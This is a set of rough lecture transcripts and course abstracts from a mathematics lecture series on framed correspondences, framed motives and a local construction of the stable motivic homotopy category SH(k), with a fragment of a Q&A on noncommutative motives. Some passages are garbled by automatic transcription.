It is in fact the same to take the K-theory of X and localize it with respect to complex K-theory, and then complete at l — you actually get the same spectrum. And now here you have K-theory, something that you can phrase for any dg category, in any generality. And so you see that the reformulation of the conjecture would be saying that the Chern character from K_0 to this target lands precisely on the classes that are stable under the action of the absolute Galois group. So I think it was already phrased like this in an old paper of Friedlander. — I have another question: are there any strictly noncommutative applications of the conjectures, or of any of the conjectures? — Yes; I mean, this is somehow a motivation. Let's say that if we divide the world in two, many more people work on the commutative side than on this side, I agree, and people are motivated to try to prove those statements. But on this side, these conjectures, as we'll see on Wednesday, will for example allow us to have a conditional description of the category of noncommutative numerical motives — something a bit analogous to what Milne has done, described in terms of Weil numbers up to a certain action of the absolute Galois group, and things like that. So yeah, we will attack, for example, this conjecture next time, on Wednesday; for example, we'll prove that all these noncommutative conjectures hold if you put here an algebra which is finite-dimensional and of finite global dimension, not necessarily commutative. So there are two paths, Wednesday and Thursday: on Wednesday we go in the noncommutative direction and on Thursday in the commutative direction, and in both cases we are going to explore the link between the two. — There's another question: are there any new cases known where the conjecture holds in the noncommutative setting? — What I will explain on Thursday is a way to prove this conjecture in some new cases where you don't use geometry: you prove the conjecture using noncommutative techniques, and as a consequence you get the conjecture for X's which were not known previously. If I understood the question correctly, is this more or less what was being asked? New cases: yes, in the very last talk I will prove the classical conjectures in new cases, and the way to prove them is not by using geometry but by using this viewpoint. — Last question: is there a paper attached to this mini-course where we can read more details? — Yes, absolutely. In fact, there is a survey on the arXiv whose title is equal to the title of this course — it is called "Noncommutative counterparts of celebrated conjectures", if I remember correctly. — Okay, so there are no more questions in the chat, it seems. Are there questions in the room? No? No. Okay, so good. Thanks again. — Sorry for going over time; I got a bit confused with the time. — Yeah, okay. I'm sorry for those who had problems with the connection. Okay, so we meet again for the next lecture.
|
Some celebrated conjectures of Beilinson, Grothendieck, Kimura, Tate, Voevodsky, Weil, and others play a central role in algebraic geometry. Notwithstanding the effort of several generations of mathematicians, the proof of (the majority of) these conjectures remains elusive. The aim of this course, prepared for a broad audience, is to give an overview of a recent noncommutative approach which has led to the proof of the aforementioned important conjectures in some new cases.
|
10.5446/50935 (DOI)
|
The title of my second lecture is "A local approach to SH(k)". The purpose of this lecture is to give another approach to the stable motivic homotopy category: more precisely, we define a triangulated category SH_fr^nis(k) of framed bispectra. Consider the category of bispectra in the category M_k of pointed motivic spaces, that is, of pointed Nisnevich sheaves on Sm/k. Here Gm^∧1 is the mapping cone of the unit section Spec(k)_+ → (Gm)_+, the map which takes the distinguished point to the distinguished point and the non-distinguished point to the point 1 of Gm. Equivalently, Gm^∧1 is the pushout of a diagram of this form, in which I is the pointed simplicial set Δ[1] — the simplicial interval — with base point 1. One could draw a picture of how this looks, but let me skip it, because it is not quite essential. The category of bispectra comes equipped with a stable projective local model structure, defined as follows. First of all, it is well known that the category of pointed motivic spaces comes equipped with the projective local monoidal model structure in which the weak equivalences are the Nisnevich local weak equivalences: a map of motivic spaces is a weak equivalence in this structure provided it is a stalkwise weak equivalence. Stabilizing this model structure in the S^1-direction, we get the category Sp_{S^1}(k) of motivic S^1-spectra, which is equipped with the stable projective local monoidal structure whose weak equivalences are the maps of spectra inducing isomorphisms on the Nisnevich sheaves of stable homotopy groups — equivalently, the maps inducing stable weak equivalences on the stalks of the motivic S^1-spectra. Now, stabilizing the model structure on Sp_{S^1}(k) in the Gm^∧1-direction, we arrive at the stable projective local model structure on the category of bispectra. Its triangulated homotopy category is denoted by SH_nis(k). It is this triangulated category SH_nis(k) which is the basis for all our further definitions. The nearest aim is to define the category SH_fr^nis(k) as a full subcategory of SH_nis(k); framed presheaves and sheaves will be engaged in this definition. A pointed framed presheaf on Sm/k is a contravariant functor from Fr_+(k) to the category of pointed sets. A framed Nisnevich sheaf is a framed presheaf whose restriction to Sm/k is a Nisnevich sheaf. A framed presheaf F of abelian groups is a contravariant functor from Fr_+(k) to the category of abelian groups. It is called radditive if F evaluated on the empty scheme is the zero group and F(X_1 ⊔ X_2) is the product F(X_1) × F(X_2). One more notion concerning framed presheaves is the following: a framed presheaf F of abelian groups is called stable if for every smooth variety X the map σ_X^*: F(X) → F(X), induced by the suspension correspondence σ_X recalled in the first lecture, is the identity map.
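Since the recording is difficult to follow in this passage, here is a compact restatement, as I reconstruct it, of the two definitions just given; the notation follows [5].
\[
\mathbb G_m^{\wedge 1}\;=\;\operatorname{cone}\big(\operatorname{Spec}(k)_+\xrightarrow{\ 1\ }(\mathbb G_m)_+\big),
\]
\[
F(\varnothing)=0,\qquad F(X_1\sqcup X_2)\xrightarrow{\ \cong\ }F(X_1)\times F(X_2)\quad(\text{radditivity}),\qquad \sigma_X^{*}=\operatorname{id}_{F(X)}\quad(\text{stability}).
\]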
Now the very key definition, namely the definition of the category SH_fr^nis(k). We define SH_fr^nis(k) as the full subcategory of SH_nis(k) consisting of those bispectra E satisfying the following conditions. First, each motivic space E_{i,j} of E is a space with framed correspondences, that is, a pointed Nisnevich sheaf defined on the category of framed correspondences Fr_+(k). The second condition concerns the structure maps in both directions, the S^1-direction and the Gm^∧1-direction: they are required to respect the framed structure. Third, the Nisnevich sheaves of stable homotopy groups of the motivic S^1-spectra E_{*,j} are required to be radditive, quasi-stable and A1-invariant framed sheaves, and for each j the structure map of motivic S^1-spectra relating E_{*,j}, Gm^∧1 and E_{*,j+1} is a stable local equivalence. Objects of the category SH_fr^nis(k) are called framed Nisnevich bispectra. We should stress that the definition of this category SH_fr^nis(k) is local, in the sense that it is carried out entirely inside the category SH_nis(k): no motivic equivalences occur in it at all. One first maps into SH_nis(k) using the full embedding and then compares with SH(k); a kind of quasi-inverse functor, the big framed motive functor, will be constructed below, and in this lecture I will define that functor and explain in which sense it is an inverse. There is also the notion of a level equivalence here: a map of bispectra inducing isomorphisms of the Nisnevich sheaves of stable homotopy groups in every level; such maps are, in particular, stable motivic equivalences. There is also a very important definition needed to compute the A1-homotopy sheaves of a motivic spectrum or of a motivic bispectrum. Namely, the A1-homotopy sheaves of a motivic bispectrum are computed in terms of the stable homotopy groups of the spectrum E: the bigraded A1-homotopy sheaf of E in a given bidegree is the Nisnevich sheaf associated with the corresponding presheaf of stable homotopy groups.
I simply do not know what to call these vertical bars in the notation. And if the index is greater than zero, then the stable A1-homotopy sheaf with that index is again the Nisnevich sheaf associated with the corresponding presheaf, as above. Now, for a smooth scheme X, recall from my first lecture the framed construction C_Fr(X), built from framed correspondences out of the cosimplicial scheme Δ•; my first lecture says that the canonical map attached to it is a very important stable motivic weak equivalence. This framed construction can be applied not only to a smooth scheme but to any motivic space which is a filtered colimit of simplicial smooth schemes. So take a bispectrum E whose motivic spaces are filtered colimits of this kind; we apply the framed construction levelwise, in every bidegree, and obtain a new bispectrum. Let us see how this construction behaves: namely, take this bispectrum and stabilize it in the Gm-direction in the standard way. Of course, I will not verify all the details here. It can be checked that the bispectrum obtained in this way satisfies conditions 1, 2 and 3 of Definition 2.2 — you already know these conditions, they are the conditions stated above — so it is a framed Nisnevich bispectrum. On the other hand, for a general bispectrum satisfying conditions 1, 2 and 3 of Definition 2.2 we cannot say that it arises in this way; but, conversely, such general framed bispectra are controlled by these examples. For every smooth scheme X we can take the bisuspension spectrum of X_+ and apply the construction to it, and it turns out that the resulting bispectrum is a framed bispectrum, and it lies in SH_fr^nis(k). In general, I should stress that, in particular, to prove this we need the cancellation theorem for A1-invariant, radditive, quasi-stable framed presheaves — excuse me — we need cancellation for framed motives. The same applies more generally: take an S^1-spectrum which is a filtered colimit of the kind described above, form its Gm-suspension spectrum, apply the framed construction levelwise, and the result is a framed bispectrum.
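For readers of the recording, it may help to recall the basic framed construction that this passage applies levelwise; the notation is the one of the course abstract and of [4], and the levelwise use on bispectra is my reading of the partly inaudible explanation above.
\[
C_{\mathrm{Fr}}(X)\;=\;\mathrm{Fr}\big(\Delta^{\bullet}_{k}\times -,\;X\big),
\]
a pointed motivic space with framed correspondences, defined first for smooth schemes X and then extended to motivic spaces that are filtered colimits of simplicial smooth schemes.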
This extends to general bispectra as well: if you take a bispectrum A whose spaces are filtered colimits of simplicial smooth schemes and apply the construction levelwise, you again get a framed bispectrum, and the resulting framed bispectrum is stable motivically equivalent to the one you started with — this will be used below. I should also say that many interesting spectra can be represented in this category; for instance, there is a bispectrum constructed by Sasha Neshitov. Now I am ready to define the functor M_fr^big from SH(k) to SH_fr^nis(k), the big framed motive functor. Given a bispectrum E, consisting of the spaces E_{i,j}, one first replaces it, up to level equivalence, by a bispectrum whose spaces are filtered colimits of simplicial smooth schemes, and then applies the framed construction levelwise; the result is the framed bispectrum M_fr^big(E). By Example 3, the two comparison morphisms that arise in this construction are stable motivic equivalences. These maps, which I will call α, are therefore stable motivic equivalences, and comparing the two possible compositions one checks that the resulting formulas are identical; therefore the functor M_fr^big is well defined on the level of the homotopy categories.
The fact that the left arrow here is a stable motivic equivalence is exactly what is needed. The bispectrum of the form M_fr^big(E) is, also due to Example 3, a framed bispectrum, and, as I told above, the canonical map E → M_fr^big(E) is a stable motivic equivalence; the functor M_fr^big is thus a quasi-inverse to the evident functor in the other direction. Let me describe one more nice property of the category SH_fr^nis(k). For a framed bispectrum, the motivic S^1-spectra occurring in it are Ω_Gm-infinite loop spectra, and the composition of the two functors — the infinite Gm-loop functor and the infinite Gm-suspension functor — gets a very nice description: one applies the framed construction, and the canonical morphism of motivic S^1-spectra which arises is a stable local equivalence. This means that the computation of Ω^∞_Gm Σ^∞_Gm can be carried out Nisnevich-locally, and very easily. We have about five minutes left, so let me only say that the next lecture will explain in which sense the category SH_fr^nis(k) is equivalent to the category SH(k), and in which sense the big framed motive functor is a localization functor on the category SH_nis(k). — Many thanks indeed for the lecture! Any questions or comments? It seems that there are no questions, so let's thank the lecturer again.
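The "nice property" referred to at the end of the lecture appears to be item (4) of the course abstract, which in display form says that for every smooth (simplicial) scheme X the canonical morphism
\[
\mathrm{can}\colon\; C_{\mathrm{Fr}}(X)\;\longrightarrow\;\Omega^{\infty}_{\mathbb P^{1}}\Sigma^{\infty}_{\mathbb P^{1}}(X_{+})
\]
is Nisnevich-locally a group completion; in particular, if C_Fr(X) is Nisnevich-locally connected, then can is a Nisnevich-local weak equivalence and C_Fr(X) is an infinite motivic loop space.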
|
V. Voevodsky [6] invented the category of framed correspondences with the hope to give a new construction of stable motivic homotopy theory SH(k) which will be more friendly for computational purposes. Joint with G. Garkusha we used framed correspondences to develop the theory of framed motives in [4]. This theory led us in [5] to a genuinely local construction of SH(k). In particular, we get rid of motivic equivalences completely. In my lectures I will recall the definition of framed correspondences and describe the genuinely local model for SH(k) (assuming that the base field k is infinite and perfect). I will also discuss several applications. Let Fr(Y,X) be the pointed set of stable framed correspondences between smooth algebraic varieties Y and X. For the first two applications I choose k = ℂ for simplicity. For further two applications k is any infinite and perfect field. (1) The simplicial space Fr(∆_alg, S^1) has the homotopy type of the topological space Ω^∞Σ^∞(S^1_top). So the topological space Ω^∞_{S^1}Σ^∞_{S^1}(S^1_top) is recovered as the simplicial set Fr(∆_alg, S^1), which is described in terms of algebraic varieties only. This is one of the computational miracles of framed correspondences. (2) The assignment X ↦ π_*(Fr(∆_alg, X⊗S^1)) is a homology theory on complex algebraic varieties. Moreover, this homology theory regarded with ℤ/n-coefficients coincides with the stable homotopy groups X ↦ π^S_*(X_+∧S^1_top; ℤ/n) with ℤ/n-coefficients. The latter result is an extension of the celebrated Suslin–Voevodsky theorem on motivic homology of weight zero to the stable motivic homotopy context. (3) Another application of the theory is as follows. It turns out that π^s_{0,0}(X_+) = H_0(ℤF(∆,X)), where ℤF(∆,X) is the chain complex of stable linear framed correspondences introduced in [4]. For X = G_m^{∧n} this homology group was computed by A. Neshitov as the nth Milnor–Witt group K_n^MW(k) of the base field k, recovering the celebrated theorem of Morel. (4) As a consequence of the theory of framed motives, the canonical morphism of motivic spaces can: C_Fr(X) → Ω^∞_{ℙ^1}Σ^∞_{ℙ^1}(X_+) is Nisnevich locally a group completion for any smooth simplicial scheme X. In particular, if C_Fr(X) is Nisnevich locally connected, then the morphism can is a Nisnevich local weak equivalence. Thus in this case C_Fr(X) is an infinite motivic loop space and π_n(C_Fr(X)(K)) = π^{A1}_{n,0}(Σ^∞_{ℙ^1}(X_+))(K). In my lectures I will adhere to the following references: [1] A. Ananyevskiy, G. Garkusha, I. Panin, Cancellation theorem for framed motives of algebraic varieties, arXiv:1601.06642 [2] G. Garkusha, A. Neshitov, I. Panin, Framed motives of relative motivic spheres, arXiv:1604.02732v3. [3] G. Garkusha, I. Panin, Homotopy invariant presheaves with framed transfers, Cambridge J. Math. 8(1) (2020), 1-94. [4] G. Garkusha, I. Panin, Framed motives of algebraic varieties (after V. Voevodsky), J. Amer. Math. Soc., to appear. [5] G. Garkusha, I. Panin, The triangulated categories of framed bispectra and framed motives, arXiv:1809.08006. [6] V. Voevodsky, Notes on framed correspondences, unpublished, 2001, www.math.ias.edu/vladimir/publications
|
10.5446/50938 (DOI)
|
So thank you very much to the organizers, thank you very much to the IHES for the opportunity to give this small series of talks on one of my favorite topics, and let me start. Vladimir Voevodsky, in [6] — the numbering of papers and preprints is taken from the abstract of my talks — invented the category of framed correspondences with the hope of giving a new construction of the stable motivic homotopy theory that would be more friendly for computational purposes. In [4], jointly with G. Garkusha, we used framed correspondences to develop the theory of framed motives. The latter theory allowed us to give, in [5], a genuinely local construction of SH(k); in particular, we get rid of motivic equivalences completely. In my lectures I will recall the definition of framed correspondences and will describe the genuinely local construction of SH(k), provided that the base field k is infinite and perfect. I will also discuss applications. And now let me pass to my first lecture. So here is item one. To each couple of smooth varieties Y and X over k one attaches the pointed set Fr(Y, X) of stable framed correspondences; out of it one builds two pointed simplicial sets, Fr(Δ•, X ⊗ S^1) and Fr(Δ•, S^1), and both of them are described in terms of algebraic varieties. Here is a question: what can we state about the homotopy groups of these simplicial sets? First, they recover the homotopy groups of the classical topological space Ω^∞Σ^∞(S^1): the topological space Ω^∞_{S^1}Σ^∞_{S^1}(S^1_top) is recovered as the simplicial set Fr(Δ•_alg, S^1), which is described in terms of algebraic varieties only. This is one of the computational miracles of framed correspondences. Second, on one hand we take the simplicial set Fr(Δ•_alg, X ⊗ S^1) and take its homotopy groups with finite coefficients Z/n; on the other hand we take the topological space X_+ ∧ S^1_top, the suspension of the space of complex points, and take the stable homotopy groups of this suspension with the same finite coefficients, where X is a smooth complex algebraic variety. The result is that these two groups coincide. The latter result is an extension of the celebrated Suslin–Voevodsky theorem, stating the analogous equality in weight zero, to the stable motivic homotopy context: in the Suslin–Voevodsky theorem one takes on one side the Suslin homology of the scheme X with finite coefficients and on the other side the usual singular homology of the space of complex points with finite coefficients. In a certain sense, as I will explain below in the lectures, stable framed correspondences are a very good replacement, in the stable motivic homotopy context, for the finite correspondences of Voevodsky, which play a central role in the usual motivic business; here one works over an infinite perfect field k, and over any field extension K of it, not necessarily finite. Namely, for each smooth variety X over k and each integer n ≥ 0 we can take, on one side, the simplicial space Fr(Δ•_K, X ⊗ S^1) and take its ordinary homotopy groups; and, on the other side, take the motivic space X_+ ∧ S^1, take its P^1-suspension spectrum, take the A^1-homotopy sheaves of weight zero of this spectrum, and evaluate these sheaves on the field K. The statement is that the left-hand side canonically coincides with the right-hand side. This I will come back to over my course.
But in this first lecture I would like to formulate these statements properly. For that I need to recall the definition of stable framed correspondences and some other definitions, which are due to Voevodsky. So let me do it. First, the notion of an étale neighborhood of a closed subset Z in a scheme S: it is a triple (W, π, s), with π: W → S an étale morphism and s: Z → W a section over Z, satisfying the following conditions: π precomposed with s coincides with the closed embedding of Z into S, and the preimage π^{-1}(Z) coincides with the image s(Z). Let me draw a picture to make the definition clearer: here is S, here is Z, a closed subset, this is my W, and here is the étale map to S. Firstly the triangle commutes — π composed with the section coincides with the closed embedding — and there is also the condition that π^{-1}(Z) coincides with s(Z). Very informally speaking, you could take k to be the complex numbers and replace an étale neighborhood by a neighborhood in the strong topology; in this case the picture looks as if you take S, take a closed subset Z — say a closed complex subvariety — and then take a rather thin neighborhood of it in the strong topology: this will be your W. I would also like to say that if you have another étale neighborhood W′ of this kind, then a morphism between W′ and W of étale neighborhoods is a morphism ρ: W′ → W such that the evident triangle commutes; in particular ρ is automatically étale. With this in hand, I am able to give the major definition, which is due to Voevodsky: namely, the definition first of explicit framed correspondences of level n, and then of framed correspondences of level n. For k-smooth schemes Y and X and an integer n ≥ 0, an explicit framed correspondence of level n consists of the following data (let me draw this in a nice way): a closed subset Z in Y × A^n which is finite over Y; an étale neighborhood U of Z in Y × A^n; functions φ_1, ..., φ_n on U — that is, a morphism φ: U → A^n — such that the common vanishing locus of these functions is the closed subset Z in U; and a morphism g: U → X. The subset Z will be referred to as the support of the correspondence. We shall also write triples Φ = (Z, φ, g) or quadruples Φ = (Z, U, φ, g) to denote explicit framed correspondences. One should also say when two explicit framed correspondences (Z, U, φ, g) and (Z′, U′, φ′, g′) are called equivalent: this is the case provided that Z coincides with Z′ and one can find an étale neighborhood W of Z refining both U and U′ such that g restricted to W coincides with g′ restricted to W and φ restricted to W coincides with φ′ restricted to W. Under these conditions we call the explicit framed correspondences equivalent. A framed correspondence of level n is an equivalence class of explicit framed correspondences of level n. I will give a motivation for this definition in the second half of my lecture. We let Fr_n(Y, X) denote the set of framed correspondences from Y to X of level n. You can see that it is a pointed set, with the base point being the class 0_n of the explicit correspondence with U equal to the empty scheme.
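For the record, the data of an explicit framed correspondence of level n just described can be displayed as a quadruple:
\[
\Phi\;=\;\big(Z,\;U,\;\varphi=(\varphi_1,\dots,\varphi_n)\colon U\to\mathbb A^{n},\;g\colon U\to X\big),
\]
where Z ⊂ Y × A^n is closed and finite over Y, U is an étale neighborhood of Z in Y × A^n, and Z is the common vanishing locus of φ_1, ..., φ_n in U; the class of Φ modulo the equivalence above is an element of Fr_n(Y, X).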
One should mention that the set Fr_0(Y, X) of correspondences of level zero coincides with the set of pointed morphisms between Y_+ and X_+. Next, we would like to define a composition of framed correspondences, to eventually get a category of framed correspondences Fr_+(k). To define the composition, take a framed correspondence of level n from Y to X and a framed correspondence of level m from X to S, and define their composite as a framed correspondence of level n + m from Y to S: so here we go from Y to X and here we go from X to S, and the composite is expected to go from Y to S — and this is the case. We take, firstly, Z ×_X Z′ as the support of the composite correspondence; its étale neighborhood is U ×_X U′, and there is a closed embedding of the support into it. The framing is the morphism (φ, ψ) from U ×_X U′ to A^{n+m}, given by the family of functions φ_i precomposed with the projection to U together with the functions ψ_j precomposed with the projection to U′; and the morphism from U ×_X U′ to S is given like this: first project to U′, and from there apply g′. In this way we obtain what we call the composition of framed correspondences, which is a correspondence of level n + m between Y and S. It is not difficult to check that this composition of explicit correspondences respects the equivalence relation on them and defines a map of sets Fr_n(Y, X) × Fr_m(X, S) → Fr_{n+m}(Y, S). With this in hand, we are ready to define our category of framed correspondences: its objects are the smooth varieties, and the morphisms are given by the sets Fr_+(Y, X). And what is Fr_+(Y, X)? It is the bouquet — the wedge — of the pointed sets Fr_n(Y, X) over all n. This category Fr_+(k) is called the category of framed correspondences. There is also the category Fr_0(k): its objects are those of Fr_+(k), but its morphisms are given by the sets Fr_0(Y, X), which are the pointed morphisms between Y_+ and X_+. The category Fr_+(k) has a zero object: the zero object is the empty scheme. Thus a framed pointed presheaf is just a presheaf of pointed sets on the category Fr_+(k). The composition of two framed correspondences in certain special cases is computed in a very easy way: namely, if f is a morphism between Y′ and Y and Φ is a level n correspondence of the form above, then Φ precomposed with f is given by a simple formula, pulling back all the data along f; and if you take a morphism h between the varieties X and X′, a morphism of level zero, then h composed with Φ is given by the simple formula: we postcompose g with h, and the rest of the data is the same as for Φ. So the category is defined, and it gives a good opportunity to define the set of stable framed correspondences Fr(Y, X). For that I need to recall one more definition of Voevodsky: given a k-smooth scheme X, there is a morphism called the suspension σ_X. It is a morphism of level one from X to itself, defined by the following explicit framed correspondence: here X × {0} is the support, and it lies in X × A^1; the étale neighborhood is X × A^1 itself; t is written for the projection to A^1, which is taken as the framing function, and the projection to X is taken for g.
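In symbols, the composition and the suspension correspondence described above read (a transcription of the board, with pr denoting the evident projections):
\[
(Z',U',\psi,g')\circ(Z,U,\varphi,g)\;=\;\Big(Z\times_X Z',\;\;U\times_X U',\;\;\big(\varphi\circ\mathrm{pr}_U,\ \psi\circ\mathrm{pr}_{U'}\big),\;\;g'\circ\mathrm{pr}_{U'}\Big)\;\in\;\mathrm{Fr}_{n+m}(Y,S),
\]
\[
\sigma_X\;=\;\big(X\times\{0\},\;\;X\times\mathbb A^{1},\;\;t,\;\;\mathrm{pr}_X\big)\;\in\;\mathrm{Fr}_1(X,X).
\]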
So we need a morphism to X, and the morphism we take is the projection to X. Now, for each integer n ≥ 0, using this σ_X one defines a map of pointed sets, denoted Σ_X, from level n framed correspondences to level n+1 framed correspondences: it takes a level n correspondence Φ to σ_X ∘ Φ. We can spell this out explicitly: Σ_X takes an explicit framed correspondence of level n of the above form to the explicit framed correspondence of level n+1 of the following form: the support is Z × {0}; its neighborhood is U × A^1; there will be n+1 functions — the functions are the previous ones φ_1, ..., φ_n together with the last function, the projection to the last coordinate — and the function g is replaced by the following one: we have the morphism g to X, and we precompose it with the projection to U. Now we can give the definition of the set of stable framed correspondences between Y and X: it is just the colimit of the resulting string of pointed sets. I should mention — which I did not — that this map Σ_X is an injection of pointed sets; this is obvious to check. So, roughly speaking — or rather, exactly speaking — this colimit is just the union of the mentioned pointed sets, and it is called the set Fr(Y, X) of stable framed correspondences. What I also did not mention about the suspensions, let me mention right now: for each framed correspondence f of level zero between X and X′ there is the following equality, of which I will draw the picture: we can take σ_{X′} composed with f, and we can take f composed with σ_X, and the equality is that this diagram commutes. This is essential for what I will say right now: namely, if f is a framed correspondence of level zero, then the assignment which takes Φ to f composed with Φ defines a framed presheaf morphism f_* from the presheaf Fr(−, X) to the presheaf Fr(−, X′). As I told you, Fr(−, X) is a framed presheaf; I should also stress that these presheaves are in fact Nisnevich sheaves, by a lemma of Voevodsky. But what I want to stress here is this covariance: the morphism defined by a correspondence of level zero between X and X′. In particular, since Fr(−, X) is a framed presheaf, we can restrict it to the category Sm/k and get a pointed presheaf on Sm/k; and since f_* is a framed presheaf morphism, in particular it is a morphism of pointed presheaves on Sm/k. So let me go on. The nearest aim is to define the two simplicial sets which I used in the formulations at the beginning of my lecture. For that, let me consider the category of finite pointed sets and pointed maps. For a scheme X and a finite non-pointed set A, I will write X × A for the scheme which is the coproduct of copies of X indexed by the elements of A. I would stress that the category of finite pointed sets, with the smash product and the unit object 1_+, and the category Fr_0(k), with the Cartesian product and the unit object the point, are symmetric monoidal categories, and there is a fully faithful embedding taking a pointed set A to the scheme of the form pt × (A minus the distinguished point), where ∗ is the distinguished point of A.
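Explicitly, the suspension map and the set of stable framed correspondences just defined are:
\[
\Sigma_X(Z,U,\varphi_1,\dots,\varphi_n,g)\;=\;\big(Z\times\{0\},\;U\times\mathbb A^{1},\;\varphi_1\circ\mathrm{pr}_U,\dots,\varphi_n\circ\mathrm{pr}_U,\ \mathrm{pr}_{\mathbb A^1},\;g\circ\mathrm{pr}_U\big),
\]
\[
\mathrm{Fr}(Y,X)\;=\;\operatorname{colim}\big(\mathrm{Fr}_0(Y,X)\xrightarrow{\ \Sigma_X\ }\mathrm{Fr}_1(Y,X)\xrightarrow{\ \Sigma_X\ }\mathrm{Fr}_2(Y,X)\to\cdots\big).
\]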
So the embedding takes a finite pointed set A to the scheme pt × (A minus the distinguished point), and it takes a pointed morphism φ between pointed sets A and B to the following morphism. — Is everything okay? — Yes, it's okay. — Okay, I continue. I should comment a little bit on this: what I need to define is a morphism in Fr_0(k) between the images of A and of B, and this is, by definition, an element of the pointed morphism set between (pt × (A ∖ ∗))_+ and (pt × (B ∖ ∗))_+. I have specifically written down that the left-hand side here is exactly A and the right-hand side here is exactly B; so what I need to do is specify a pointed morphism between this pointed set and that pointed set, and I choose to take the morphism identified with φ itself as the specification — it is a pointed morphism. In this way I have defined a fully faithful embedding of the category of finite pointed sets into the category Fr_0(k), and I would stress that this embedding is strictly monoidal. The categories of simplicial objects in finite pointed sets and in Fr_0(k) are symmetric monoidal in the standard way as well, and the functor just constructed induces a fully faithful embedding between these two categories of simplicial objects; the latter embedding is strictly monoidal too. And the last couple of notations: let X• be a simplicial object in Fr_0(k), and let A• be a pointed simplicial finite set. I will write X• ⊗ A• for the object X• × A•, where I recall that A• is already regarded as an object of this category via the embedding, and the product is the monoidal one; explicitly, in each simplicial degree this is just a scheme, a coproduct of copies of the corresponding X. I will also write A• for the corresponding simplicial object over Fr_0(k); in particular this applies to the simplicial circle S^1, which becomes a simplicial object in this category. And for a smooth scheme X we thus have objects such as X ⊗ S^1.
Which I decided to formulate in this form, which is a little bit unusual, but it is a logical equivalent to the real ski to the original. Namely, this. Magic. And similarly, the shift of print responsibilities. Like this. As on the left hand side, we could take the clean it. And so on the right hand side, right hand side is defined as the night code limit of. And of this form, which are my key for spaces of this form, due to this. Place a fundamental rule role in the stable material. Right below, I will make this stages, a bit more precise. But before I would like to stress. Namely, the fun to X. Most of him of the top dot. But. S makes all the stable material to be here local. This principle will be specified in the second lecture. This is quite the same. The front x takes to go to the core delta dot cross bar, comma X. So this is the motive of X. The real skill of X makes the real ski theory of motive local. So, in certain sense, this simple shell shift in certain sense, not in a very precise sense, either substitute for M of X. At least this construction is very close to this one. Let us consider now the calling picture. Take on the left hand side. Take on the left hand side point of my two experiences and on the right hand side, take even step. Not a topic category, but just the category of given spectrum category of a point of my two spaces. One is the infinite suspension factor is respect to one and another one is the naive omega infinity to one look. They are to be joined each to the other. This is the left one. These two factors induces the corresponding direct contest a one direct contest. Between the pointed unstable material category H of k and the stable material category SH of k. The left hand side is still the infinite suspension. And the right hand side is the one direct to one look. So, shortly, I prefer to write on the infinity one for this direct. One of the major tasks of the stable material material is to compute the material space like this. Where X is the smooth variety. A similar task in top logic has been solved by the single machinery. The Matic version of the single theorem. Let k be an infinite perfect field. With the non- FIROF- naviken! And I should take this mesh robot. Omega infinity p1, sigma infinity t of x plus six one. Such a canonical morphism exists due to the fact that on the left hand side, we take the naive omega looks. And on the right hand side, we take a1 derived p1 looks. So it's naturally to expect that there is such an error and this error exists. And it states that this canonical error is a local theorem. Particularly, let k capital over k be a field extension, not necessarily finite. Then this morphism we evaluate on the field k capital and on the left hand side, and you'll get a weak equivalent of the initial sets. On the left hand side, we have the same visual set frame delta dot k capital comma x times x one. And on the right hand side, we have the, I should not shoot as one. Omega infinity p1, sigma infinity t of x plus mesh s1 evaluated on k. So this is a martyric space. So this is a shift. You can evaluate it on the field k capital and get a simple set. So the server is a VP period, VP period of some crucial sets. This theorem has a very nice and strong theory. Namely, if you take a to be the complex numbers and we take x to be the point, then the hamadopi group, hamadopi groups of this simple set, which is frame delta dot comma s1 coincide with the stable hamadopi group of the classical circle s1. 
Let me derive this corollary from the theorem. Firstly, this simplicial set is weakly equivalent to that one, because the canonical arrow is a weak equivalence of simplicial sets — so the first equality holds. The second equality holds by the very definition of the derived infinite P^1-loop functor — or, if you prefer, by the very definition of the A^1-homotopy groups of this spectrum. So what is on the right-hand side? On the right-hand side are the following groups: we take the T-suspension spectrum of S^1, we take its A^1-homotopy sheaves of weight zero — these are sheaves — and we evaluate these sheaves on the complex numbers. So this equality holds, as I told you, by the very definition of this functor. And the last equality is a very deep theorem due to M. Levine: it says that the weight-zero A^1-homotopy sheaves of, say, the suspension spectrum of S^1, evaluated on the complex numbers, coincide with the corresponding stable homotopy groups in topology — of the topological S^1. And eventually I would stress that this corollary has a stronger form: namely, the simplicial space Fr(Δ•, S^1) is weakly equivalent to the topological space Ω^∞_{S^1}Σ^∞_{S^1}(S^1_top) of the usual topological circle. So, as a kind of conclusion: the usual topological space Ω^∞Σ^∞(S^1_top) is expressed as this simplicial set, which is defined in terms of algebraic varieties only. And also, since I have a couple more minutes, let me come back to my thesis — yes, this one: this construction plays a central role in stable motivic homotopy theory, and it plays a central role due to the fact that, up to some extent, it makes all of stable motivic homotopy theory local. In the second lecture this principle will be specified — or, let us say, clarified; we will make this principle quite precise. Thank you very much; this is the end of my first lecture. — Thank you for a very nice lecture. Maybe I can pose the first question. Let's go to Theorem 1.10. — 1.10? Okay. — Yes, and I should add the smash there, as you already have done. Can you describe the maps in that theorem? — I would like to say only a few words, and a bit roughly. As I told you, this is on the left-hand side, and here is the naive Ω^∞ and here is Σ^∞. From the naive Ω^∞ we have a pretty obvious map to the derived one — it is just a natural transformation from the naive infinite loop functor to the derived infinite loop functor. Yeah, that gives the arrow. Is it okay? — Yes, thank you. — Any other questions or comments? Use a mic. — Sorry, can you explain a little bit why you need k infinite in Theorem 1.10? — Yeah, in Theorem 1.10. The theory which, I would say, is behind the theorem is written down in published papers for an infinite field; for a field which is finite there are references — help me, please... due to a Ph.D. student, Jonas — which are still in preprint form. I mean, surely one can replace "infinite" — I mean, eliminate it and say: take any field. — There don't seem to be any other questions. Anyone else? I think it means that your lecture was accepted. — Thank you. Thanks a lot.
|
